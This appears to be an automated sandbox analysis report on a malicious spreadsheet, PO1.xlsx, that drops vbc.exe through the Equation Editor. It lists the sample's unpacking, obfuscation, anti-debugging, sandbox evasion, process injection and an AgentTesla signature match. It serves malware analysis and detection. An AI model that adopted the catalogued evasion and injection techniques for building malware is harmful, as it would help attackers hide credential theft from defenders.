Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\vbc.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\vbc.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\vbc.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\vbc.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: PO1.xlsx ReversingLabs: Detection: 31%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: PO1.xlsx Initial sample: OLE indicators vbamacros = False
Source: PO1.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\Public\vbc.exe Unpacked PE file: 5.2.vbc.exe.400000.3.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\Public\vbc.exe Unpacked PE file: 5.2.vbc.exe.400000.3.unpack
Contains functionality to dynamically determine API calls
Source: C:\Users\Public\vbc.exe Code function: 4_2_00443C20 SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode, 4_2_00443C20
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_00444250 push 004442DDh; ret 4_2_004442D5
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040C020 push 0040C038h; ret 4_2_0040C030
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040C03A push 0040C0ABh; ret 4_2_0040C0A3
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040C03C push 0040C0ABh; ret 4_2_0040C0A3
Source: C:\Users\Public\vbc.exe Code function: 4_2_00410150 push 004101B1h; ret 4_2_004101A9
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040C11A push 0040C148h; ret 4_2_0040C140
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040C11C push 0040C148h; ret 4_2_0040C140
Source: C:\Users\Public\vbc.exe Code function: 4_2_0046C120 push 0046C153h; ret 4_2_0046C14B
Source: C:\Users\Public\vbc.exe Code function: 4_2_0046C1DC push 0046C208h; ret 4_2_0046C200
Source: C:\Users\Public\vbc.exe Code function: 4_2_0045A1D8 push ecx; mov dword ptr [esp], edx 4_2_0045A1DD
Source: C:\Users\Public\vbc.exe Code function: 4_2_004281DC push 00428208h; ret 4_2_00428200
Source: C:\Users\Public\vbc.exe Code function: 4_2_004441E8 push 0044424Eh; ret 4_2_00444246
Source: C:\Users\Public\vbc.exe Code function: 4_2_00428190 push 004281D1h; ret 4_2_004281C9
Source: C:\Users\Public\vbc.exe Code function: 4_2_004101B4 push 004103B5h; ret 4_2_004103AD
Source: C:\Users\Public\vbc.exe Code function: 4_2_00428214 push 0042824Ch; ret 4_2_00428244
Source: C:\Users\Public\vbc.exe Code function: 4_2_0046C22C push 0046C26Fh; ret 4_2_0046C267
Source: C:\Users\Public\vbc.exe Code function: 4_2_0041C234 push ecx; mov dword ptr [esp], edx 4_2_0041C239
Source: C:\Users\Public\vbc.exe Code function: 4_2_0046C2EC push 0046C318h; ret 4_2_0046C310
Source: C:\Users\Public\vbc.exe Code function: 4_2_0046C294 push 0046C2D7h; ret 4_2_0046C2CF
Source: C:\Users\Public\vbc.exe Code function: 4_2_00432364 push 004323BDh; ret 4_2_004323B5
Source: C:\Users\Public\vbc.exe Code function: 4_2_0046C324 push 0046C350h; ret 4_2_0046C348
Source: C:\Users\Public\vbc.exe Code function: 4_2_004263D8 push 004264A8h; ret 4_2_004264A0
Source: C:\Users\Public\vbc.exe Code function: 4_2_004103B8 push 004104FCh; ret 4_2_004104F4
Source: C:\Users\Public\vbc.exe Code function: 4_2_00412470 push eax; retf 0041h 4_2_00412471
Source: C:\Users\Public\vbc.exe Code function: 4_2_0041A4C8 push ecx; mov dword ptr [esp], edx 4_2_0041A4CA
Source: C:\Users\Public\vbc.exe Code function: 4_2_004104D0 push 004104FCh; ret 4_2_004104F4
Source: C:\Users\Public\vbc.exe Code function: 4_2_0047055C push 00470588h; ret 4_2_00470580
Source: C:\Users\Public\vbc.exe Code function: 4_2_00406576 push 004065C9h; ret 4_2_004065C1
Source: C:\Users\Public\vbc.exe Code function: 4_2_00406578 push 004065C9h; ret 4_2_004065C1
Source: C:\Users\Public\vbc.exe Code function: 4_2_00428538 push 00428564h; ret 4_2_0042855C
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042C5E4 push 0042C610h; ret 4_2_0042C608

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\Public\vbc.exe Code function: 4_2_00457EFC PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 4_2_00457EFC
Source: C:\Users\Public\vbc.exe Code function: 4_2_0043E4F4 IsIconic,GetCapture, 4_2_0043E4F4
Source: C:\Users\Public\vbc.exe Code function: 4_2_004585F0 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 4_2_004585F0
Source: C:\Users\Public\vbc.exe Code function: 4_2_004586A0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 4_2_004586A0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00426BA4 IsIconic,GetWindowPlacement,GetWindowRect, 4_2_00426BA4
Source: C:\Users\Public\vbc.exe Code function: 4_2_0043ED9C IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 4_2_0043ED9C
Source: C:\Users\Public\vbc.exe Code function: 4_2_00454FF0 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 4_2_00454FF0
Source: C:\Users\Public\vbc.exe Code function: 4_2_0043F680 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 4_2_0043F680
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\Public\vbc.exe Code function: 4_2_00443C20 SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode, 4_2_00443C20
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\Public\vbc.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: PO1.xlsx Stream path 'EncryptedPackage' entropy: 7.99801136076 (max. 8.0)

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modifications
Source: C:\Users\Public\vbc.exe Code function: 4_2_0043372C 4_2_0043372C
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Contains functionality to detect sandboxes (mouse cursor move detection)
Source: C:\Users\Public\vbc.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject, 4_2_004574D0
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\Public\vbc.exe Window / User API: threadDelayed 792 Jump to behavior
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Users\Public\vbc.exe Code function: 4_2_0043372C 4_2_0043372C
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 960 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 960 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3052 Thread sleep time: -540000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3032 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3016 Thread sleep count: 792 > 30 Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3032 Thread sleep time: -58004s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3032 Thread sleep time: -56912s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3032 Thread sleep time: -50796s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3032 Thread sleep time: -50610s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3032 Thread sleep time: -49704s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3032 Thread sleep time: -48612s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3032 Thread sleep time: -47302s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3032 Thread sleep time: -46210s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3032 Thread sleep time: -44900s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3032 Thread sleep time: -44712s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3032 Thread sleep time: -42310s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3032 Thread sleep time: -39908s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3032 Thread sleep time: -39002s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3032 Thread sleep time: -36600s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3032 Thread sleep time: -35508s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3032 Thread sleep time: -34198s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3032 Thread sleep time: -34010s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3032 Thread sleep time: -33106s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3032 Thread sleep time: -30704s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3032 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3032 Thread sleep time: -49298s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3032 Thread sleep time: -45398s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3032 Thread sleep time: -38596s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3032 Thread sleep time: -35102s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3032 Thread sleep time: -34696s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3032 Thread sleep time: -31202s >= -30000s Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\Public\vbc.exe Last function: Thread delayed
Uses the system / local time for branch decision (may execute only at specific dates)
Source: C:\Users\Public\vbc.exe Code function: 4_2_004703B0 GetSystemTime followed by cmp: cmp word ptr [esp], 07e4h and CTI: jnc 004703CBh 4_2_004703B0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00408938 FindFirstFileA,GetLastError, 4_2_00408938
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405AC0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 4_2_00405AC0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00420B24 GetSystemInfo, 4_2_00420B24
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugFlags Jump to behavior
Source: C:\Users\Public\vbc.exe Process queried: DebugObjectHandle Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\Public\vbc.exe Code function: 5_2_0043F6F3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_0043F6F3
Contains functionality to dynamically determine API calls
Source: C:\Users\Public\vbc.exe Code function: 4_2_00443C20 SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode, 4_2_00443C20
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 5_2_00443412 mov eax, dword ptr fs:[00000030h] 5_2_00443412
Source: C:\Users\Public\vbc.exe Code function: 5_2_004434D0 mov eax, dword ptr fs:[00000030h] 5_2_004434D0
Source: C:\Users\Public\vbc.exe Code function: 5_1_00443412 mov eax, dword ptr fs:[00000030h] 5_1_00443412
Source: C:\Users\Public\vbc.exe Code function: 5_1_004434D0 mov eax, dword ptr fs:[00000030h] 5_1_004434D0
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 5_2_0043F6F3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_0043F6F3
Source: C:\Users\Public\vbc.exe Code function: 5_2_0043E746 SetUnhandledExceptionFilter, 5_2_0043E746
Source: C:\Users\Public\vbc.exe Code function: 5_2_00441D7F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_00441D7F
Source: C:\Users\Public\vbc.exe Code function: 5_2_0043FBB5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_0043FBB5
Source: C:\Users\Public\vbc.exe Code function: 5_1_0043F6F3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_1_0043F6F3
Source: C:\Users\Public\vbc.exe Code function: 5_1_0043E746 SetUnhandledExceptionFilter, 5_1_0043E746
Source: C:\Users\Public\vbc.exe Code function: 5_1_00441D7F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_1_00441D7F
Source: C:\Users\Public\vbc.exe Code function: 5_1_0043FBB5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_1_0043FBB5
Source: C:\Users\Public\vbc.exe Memory protected: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Users\Public\vbc.exe protection: execute and read and write Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: vbc.exe, 00000005.00000002.2347699575.00000000009E0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: vbc.exe, 00000005.00000002.2347699575.00000000009E0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000005.00000002.2347699575.00000000009E0000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\Public\vbc.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 4_2_00405C78
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA,GetACP, 4_2_0040ACF0
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA, 4_2_00409940
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA, 4_2_0040998C
Source: C:\Users\Public\vbc.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 4_2_00405D84
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA, 5_2_00442A4A
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA, 5_1_00442A4A
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 4_2_004703B0 GetSystemTime,ExitProcess,7038B924, 4_2_004703B0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00444250 GetVersion, 4_2_00444250
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected AgentTesla
Source: Yara match File source: 00000004.00000002.2138307858.0000000002EAB000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2348263870.0000000002454000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000001.2133236843.000000000044B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2347334387.00000000002A2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2348110727.0000000002331000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2347423777.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2347280269.0000000000220000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2138244696.0000000002E62000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2347452844.000000000044B000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2347308194.0000000000262000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2348216002.0000000002401000.00000004.00000001.sdmp, type: MEMORY
